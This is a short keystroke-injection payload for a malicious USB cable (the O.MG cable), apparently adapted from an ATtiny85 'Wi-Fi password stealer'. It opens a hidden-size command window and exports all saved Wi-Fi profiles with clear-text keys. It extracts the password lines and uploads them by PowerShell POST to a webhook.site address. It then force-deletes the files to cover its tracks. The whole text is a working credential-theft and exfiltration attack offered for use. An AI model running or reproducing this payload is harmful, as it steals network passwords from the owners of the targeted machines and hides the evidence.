REM I took my own code and found the other version already made. I combined them to make it better
REM this is a modified version of https://github.com/MTK911/Attiny85/blob/master/payloads/Wi-Fi%20password%20stealer/Wifikey-Grab.ino 
REM this is designed for the omg cable instead of the tiny.


Delay 3000
STRING GUI r
Delay 100 
String cmd /k mode con: cols=15 lines=1
Enter
Delay 500
String cd %temp%
Enter
Delay 500  
String netsh wlan export profile key=clear
Enter
Delay 1000  
String powershell Select-String -Path Wi*.xml -Pattern 'keyMaterial' > Wi-Fi-PASS
Enter
Delay 3000  
String powershell Invoke-WebRequest -Uri https://webhook.site/<ADD-WEBHOOK-ADDRESS-HERE> -Method POST -InFile Wi-Fi-PASS
Enter
Delay 3000  
String del Wi* /s /f /q
Enter
Delay 1000
Exit
